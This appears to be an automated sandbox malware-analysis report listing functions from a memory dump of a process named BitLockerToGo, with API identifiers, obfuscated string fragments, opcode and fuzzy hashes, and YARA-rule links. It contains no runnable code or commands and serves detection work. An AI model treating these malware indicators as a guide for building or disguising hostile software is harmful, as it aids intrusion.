                                                                                                                                                                                                                                                  • CoUninitialize.OLE32 ref: 004127AB
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: DirectorySystemUninitialize
                                                                                                                                                                                                                                                  • String ID: ?]1$47$4\$4`[b$4`[b$9($:;:9$@3I5$D$D'5%$H#Y!$M/_-$_^]\$f$o+X)$C"E$K*M
                                                                                                                                                                                                                                                  • API String ID: 1148197201-139556607
                                                                                                                                                                                                                                                  • Opcode ID: 04335269100b805bdf20b4dc7937989325e66f61a00d5bab25321ab27e7fe6d4
                                                                                                                                                                                                                                                  • Instruction ID: 9e7cb18b268bd2ed3c1f69bbef12c03282a74bcdcef4cf6b63c5c93df46bb6b8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 04335269100b805bdf20b4dc7937989325e66f61a00d5bab25321ab27e7fe6d4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 45A29CB0409380DAE3319F15D850BEFBBE1BF96309F04092DE4C997292D77A8955CB5B
                                                                                                                                                                                                                                                  Function 0042BB20 Relevance: 22.1, APIs: 1, Strings: 11, Instructions: 1072COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: /O:A$4`[b$4`[b$89$8CBE$E3F5$W7JI$g?@1$m`he$7#v$EG
                                                                                                                                                                                                                                                  • API String ID: 0-1363345488
                                                                                                                                                                                                                                                  • Opcode ID: 67720638618d44f78a4bc5ca6c6cf3f05036a903260ab27c27233ac9f918a0b6
                                                                                                                                                                                                                                                  • Instruction ID: a82109d1bba02ab8ac561d85f1e107826aa68ad2b49ac7866b50eb9da56049a7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 67720638618d44f78a4bc5ca6c6cf3f05036a903260ab27c27233ac9f918a0b6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F572EAB1608350CBD310DF29E880A1FBBE1FB85345F844A2DE5C59B362D739D911CB9A
                                                                                                                                                                                                                                                  Function 0041D792 Relevance: 21.2, Strings: 16, Instructions: 1168COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FreeHeapInitializeThunk
                                                                                                                                                                                                                                                  • String ID: $%&'$()&'$()*+$,-./$,_9Q$0123$22.h$3W"i$7W2Q$8967$<=>?$PS$_^]\$gfed$srqp$|_"Y
                                                                                                                                                                                                                                                  • API String ID: 3158435063-286885100
                                                                                                                                                                                                                                                  • Opcode ID: a0f1640b46e2f738b28d0a8e64b65ff4357a3a7ad8e2f9907d4220f5a7389166
                                                                                                                                                                                                                                                  • Instruction ID: 1cd19c56e22c8020b659138ba7966ddbd63740ad268a29ca69b1b07885eb46d0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a0f1640b46e2f738b28d0a8e64b65ff4357a3a7ad8e2f9907d4220f5a7389166
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E7A28AB56083819BE730DF15C841BABBBE1BFC0344F54481EEAC99B391D7789845CB9A
                                                                                                                                                                                                                                                  Function 00431750 Relevance: 16.7, APIs: 2, Strings: 7, Instructions: 926COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: .L6h$HP@^$W%Pb$lokz$zzcd$#v$@C
                                                                                                                                                                                                                                                  • API String ID: 0-755784068
                                                                                                                                                                                                                                                  • Opcode ID: 7af2d4618778e7b08505e564cc688746af375601fe089f1d7f090a7425b541cb
                                                                                                                                                                                                                                                  • Instruction ID: 96953701264cbcf2442d436ec8942ebab6b3811ce24a71867e836ecb857ad73c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7af2d4618778e7b08505e564cc688746af375601fe089f1d7f090a7425b541cb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23727970405B808AD7728F25C850BA3BBE0AF1B346F14199ED4EB8B392D739B545CF69
                                                                                                                                                                                                                                                  Function 00423190 Relevance: 15.7, Strings: 12, Instructions: 674COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 2|$4`[b$JNWH$]IN^$ezx|$su$sw$xf$x{$|ltp$|}$~y
                                                                                                                                                                                                                                                  • API String ID: 0-2799980340
                                                                                                                                                                                                                                                  • Opcode ID: 77801a9a07779b0cb26c38d3582ae9014347f2fbe7211115319c16680c5a488f
                                                                                                                                                                                                                                                  • Instruction ID: 4699e4317f9cbef6698a028b5106c65fc979e4a5a6c46e980e19eb7540a83f57
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 77801a9a07779b0cb26c38d3582ae9014347f2fbe7211115319c16680c5a488f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6932BAB5608390AFC7009F29A840A1FBBF1EF86715F54882EF9D487352D779DA40CB5A
                                                                                                                                                                                                                                                  Function 0042ABBC Relevance: 13.0, Strings: 10, Instructions: 502COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: w1u$$W U$+[&Y$4`[b$4`[b$4`[b$=O?M$_^]\$c/g-$cS'Q
                                                                                                                                                                                                                                                  • API String ID: 0-1580076734
                                                                                                                                                                                                                                                  • Opcode ID: 29d9bc48f2c17d0ecb9332967ee71dd5633b6c18f9b92d2ef88b074df75df1ff
                                                                                                                                                                                                                                                  • Instruction ID: 995d359495d75edaa824897034d7c3d45e2c42dcb98ad6caad5d3ed932cd7176
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 29d9bc48f2c17d0ecb9332967ee71dd5633b6c18f9b92d2ef88b074df75df1ff
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C12BF75A01219CFEB10CF95EC80BAEBBB1FF06301F5485A9E405AB352D7349951CF69
                                                                                                                                                                                                                                                  Function 00433FB6 Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 434COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: .L6h$>:6"$HP@^$lokz$#v
                                                                                                                                                                                                                                                  • API String ID: 0-2201430921
                                                                                                                                                                                                                                                  • Opcode ID: 327caa4a73936e3c55350404ca8e0f897ca33715ba31ddefe622ca177f31deeb
                                                                                                                                                                                                                                                  • Instruction ID: 3eefcf982a3e509267cf69e6ec64a8e3e0b3bbe304a25cc0d6ee8dd92c22c4ea
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 327caa4a73936e3c55350404ca8e0f897ca33715ba31ddefe622ca177f31deeb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E7F15870405B808AD3618F34C950BE3BBE4AF1B706F44289ED4EA9B292D779B545CF29
                                                                                                                                                                                                                                                  Function 0044033D Relevance: 10.9, APIs: 7, Instructions: 352memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: String$AllocFree
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 344208780-0
                                                                                                                                                                                                                                                  • Opcode ID: 94a292752f9614754d471af5a188e06cc9061cc6550c7855173e67f4104aea6c
                                                                                                                                                                                                                                                  • Instruction ID: f135075bffec4a626f3ec7be0a44754917c2edd88eaf66b26224a5bb1ef869d1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 94a292752f9614754d471af5a188e06cc9061cc6550c7855173e67f4104aea6c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0AC18675A08300DFE3008F24E884B1ABBE5FBC9319F14892DF5958B2A1D739D955CF5A
                                                                                                                                                                                                                                                  Function 00438BD0 Relevance: 9.1, APIs: 6, Instructions: 122clipboardCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Clipboard$CloseDataLongOpenWindow
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1647500905-0
                                                                                                                                                                                                                                                  • Opcode ID: 3a9c7554c754de7e3a4742235aa5866b2028d76b55159a42ec3e006b0e8d1b51
                                                                                                                                                                                                                                                  • Instruction ID: 2cbda6d2e80645b9d1733c0759610c8073cbad84bba436d3ebc3ba58114b5e9d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3a9c7554c754de7e3a4742235aa5866b2028d76b55159a42ec3e006b0e8d1b51
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC41C5B4908782CFC710AB7C944536EBFA0AB16320F148A2EF4E69B3D1D73894469767
                                                                                                                                                                                                                                                  Function 0040131C Relevance: 7.2, Strings: 5, Instructions: 949COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 0$0$0$@$i
                                                                                                                                                                                                                                                  • API String ID: 0-3124195287
                                                                                                                                                                                                                                                  • Opcode ID: 6787af947265104bb1acbb8a5c7a34e8376bd9d16db84e233e5cde7ded05297c
                                                                                                                                                                                                                                                  • Instruction ID: 898cf8ed4cfeb83bbdb70a067079a9a1aa65e8c15bfd98737d19ef8487f830a8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6787af947265104bb1acbb8a5c7a34e8376bd9d16db84e233e5cde7ded05297c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A772F371A0C3518BC714DE28C59472BBBE1AB89304F148A3EE9D9A73D1D3B8DD45CB86
                                                                                                                                                                                                                                                  Function 00428556 Relevance: 6.8, Strings: 5, Instructions: 544COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 4`[b$4`[b$\$_^]\$_P
                                                                                                                                                                                                                                                  • API String ID: 0-1724557354
                                                                                                                                                                                                                                                  • Opcode ID: b20b07a394aca3465962260e8de7f294e5b23e18a0c09150076c7a92daab9bea
                                                                                                                                                                                                                                                  • Instruction ID: 7ea99d210da17e0beb30af7fbedfca09b84a63f2e7f007f98dc617392b86558c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b20b07a394aca3465962260e8de7f294e5b23e18a0c09150076c7a92daab9bea
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E02DA716093128BC724EF24E94062FB7F1FF85701F94892EE4C197261EB38E905CB9A
                                                                                                                                                                                                                                                  Function 0040D970 Relevance: 6.5, Strings: 5, Instructions: 209COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: ntpr$p$rM$uw$~
                                                                                                                                                                                                                                                  • API String ID: 0-317133307
                                                                                                                                                                                                                                                  • Opcode ID: 954446b4bd5812e5049ed3da10e4e1ed78eb8419fd69487ef17b1c8ca47bdc9a
                                                                                                                                                                                                                                                  • Instruction ID: 427a7f3c439e32a33df1548220e28a3a0649f7177977aaaea9bd629c7e183958
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 954446b4bd5812e5049ed3da10e4e1ed78eb8419fd69487ef17b1c8ca47bdc9a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5A513AB450C3818FD301DF69D19461BBFE2AF97744F18485DE4D56B392C37A98088BA7
                                                                                                                                                                                                                                                  Function 0042CFBC Relevance: 5.5, Strings: 4, Instructions: 461COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: %Y$4`[b$_^]\$_^]\
                                                                                                                                                                                                                                                  • API String ID: 0-3285931464
                                                                                                                                                                                                                                                  • Opcode ID: dadff45a8907b917d93b92e60ab4e3afbc5e473925f3562d8ca7bbe4b25df716
                                                                                                                                                                                                                                                  • Instruction ID: 8c2f4f18013369bca2d1707adeea8464ac6d8b2af5e080250108c49ea558e976
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dadff45a8907b917d93b92e60ab4e3afbc5e473925f3562d8ca7bbe4b25df716
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BBF10271A08791CFD710CF28E84071ABBE2BF8A311F5489ADE4D4973A2D735D914CB96
                                                                                                                                                                                                                                                  Function 0042B720 Relevance: 5.3, Strings: 4, Instructions: 344COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                  • String ID: _^]\$avub$x${'~s
                                                                                                                                                                                                                                                  • API String ID: 2994545307-3044202774
                                                                                                                                                                                                                                                  • Opcode ID: f75ff701c71e0a8b474914c817b1e9f7bc6f1c9d3b34d3d6e9531d6320b88a44
                                                                                                                                                                                                                                                  • Instruction ID: 13bd4564901cf694059441e2cf04767a1e1d2f5ed2cdbe636a6f3cbdc4c3112b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f75ff701c71e0a8b474914c817b1e9f7bc6f1c9d3b34d3d6e9531d6320b88a44
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3DB1F2717083119BD714EF18E88172BB7E2EF95304F54892EE98687392E339D904CBDA
                                                                                                                                                                                                                                                  Function 00432DD3 Relevance: 4.5, Strings: 3, Instructions: 774COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: &@>U$QZSy$U'Y.
                                                                                                                                                                                                                                                  • API String ID: 0-909587503
                                                                                                                                                                                                                                                  • Opcode ID: 05242d111021be46ec2164097b94d20b2e66ed19f211711c02a66f729245e247
                                                                                                                                                                                                                                                  • Instruction ID: 2161473bf2361a92ceaa9cb54551f0fb9f89af9ece5213ca3a433c99f0a4a441
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 05242d111021be46ec2164097b94d20b2e66ed19f211711c02a66f729245e247
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 58527D70509B808EE725CF25C590BA3BBE1AF1B705F44189ED4EB8B782C739B509CB65
                                                                                                                                                                                                                                                  Function 00425F80 Relevance: 4.2, Strings: 3, Instructions: 425COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 4`[b$<="#$_^]\
                                                                                                                                                                                                                                                  • API String ID: 0-3452410732
                                                                                                                                                                                                                                                  • Opcode ID: 18b0e22206b6f74d83c41bb87df0fb3e24541001dcd00414866963959e5fe729
                                                                                                                                                                                                                                                  • Instruction ID: d3992a084795c76ff9c5862970b98df6777bb0ba5fba2fadfee05f134e359f01
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 18b0e22206b6f74d83c41bb87df0fb3e24541001dcd00414866963959e5fe729
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DCC1DF716082209BD710EB14E881A2BB7F5EF95314F8A495EF8C597352E339EC50CB6B
                                                                                                                                                                                                                                                  Function 004207C0 Relevance: 4.1, Strings: 3, Instructions: 397COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 45$\]$}z
                                                                                                                                                                                                                                                  • API String ID: 0-842270974
                                                                                                                                                                                                                                                  • Opcode ID: bbe493518d6f8d44676b0ba3c327efc391f0e8b33744995f52980cb7b59b2153
                                                                                                                                                                                                                                                  • Instruction ID: 4e228249d011206b6ade4a0ddf9e9682f6823525dbcc358578d8f107d278bfb2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bbe493518d6f8d44676b0ba3c327efc391f0e8b33744995f52980cb7b59b2153
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 43D176B560C3909BD700EF19E881A2FBBE5AF96348F44492DF4C497362D339C954CB9A
                                                                                                                                                                                                                                                  Function 004404F0 Relevance: 4.1, Strings: 3, Instructions: 366COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 4`[b$4`[b$_^]\
                                                                                                                                                                                                                                                  • API String ID: 0-97030994
                                                                                                                                                                                                                                                  • Opcode ID: 4eb0e058685f2ef41423415ec5d4c156e8cc0db07c27f8428a8c29bbdc5f7471
                                                                                                                                                                                                                                                  • Instruction ID: 2283bfc76b0b7f117c974d4202c84912144bd883119bde084c22fa3da060c7e1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4eb0e058685f2ef41423415ec5d4c156e8cc0db07c27f8428a8c29bbdc5f7471
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D9B19F7060C3009BE710EF65E944B2BB7E5EB85709F14882DF6C587292D739E861CF6A
                                                                                                                                                                                                                                                  Function 00445230 Relevance: 3.1, Strings: 2, Instructions: 585COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: _^]\$f
                                                                                                                                                                                                                                                  • API String ID: 0-3267448651
                                                                                                                                                                                                                                                  • Opcode ID: a773e4a6ec06c76c36819f45243fa63d7ab06dc39b293a14f3ced3bcbb3b065a
                                                                                                                                                                                                                                                  • Instruction ID: 9e77a4df54d9d46435aa8e05a039ca6cafb08939dbcee635609de0b7fe9ee7e6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a773e4a6ec06c76c36819f45243fa63d7ab06dc39b293a14f3ced3bcbb3b065a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2922CE716087019FEB14CF18C880B2FBBE2AF85354F58892EF895873A2D779D845CB56
                                                                                                                                                                                                                                                  Function 004035F0 Relevance: 2.9, Strings: 2, Instructions: 438COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: Inf$NaN
                                                                                                                                                                                                                                                  • API String ID: 0-3500518849
                                                                                                                                                                                                                                                  • Opcode ID: 679b1f445c048e88d71e288fdbc6d48e9e08f6b1e45264a120c03ea8904ff267
                                                                                                                                                                                                                                                  • Instruction ID: 05fdb1c5240496edcd7edbe6c9c106e948318fb961b80fb5974e1146517e67c6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 679b1f445c048e88d71e288fdbc6d48e9e08f6b1e45264a120c03ea8904ff267
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 33E1A472A083019BC704CF29C48165BBBE6EBC4750F25CA3EF899A7390E775DD458B86
                                                                                                                                                                                                                                                  Function 00449C70 Relevance: 2.2, Strings: 1, Instructions: 976COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 0$
                                                                                                                                                                                                                                                  • API String ID: 0-900979605
                                                                                                                                                                                                                                                  • Opcode ID: 0a0e065abe5f321b6c3029dd4d66520a8778e47004655c1f161daec0232fa0b6
                                                                                                                                                                                                                                                  • Instruction ID: 2376413ddf36ca4e29981d892b6e37da2581e6c9d26f60befa3634c74a0835f6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0a0e065abe5f321b6c3029dd4d66520a8778e47004655c1f161daec0232fa0b6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F52BF36608341CFD704DF28E8A462EB7F2FB8A316F19886EE58587352D735E914CB46
                                                                                                                                                                                                                                                  Function 00449E90 Relevance: 2.0, Strings: 1, Instructions: 800COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 0$
                                                                                                                                                                                                                                                  • API String ID: 0-900979605
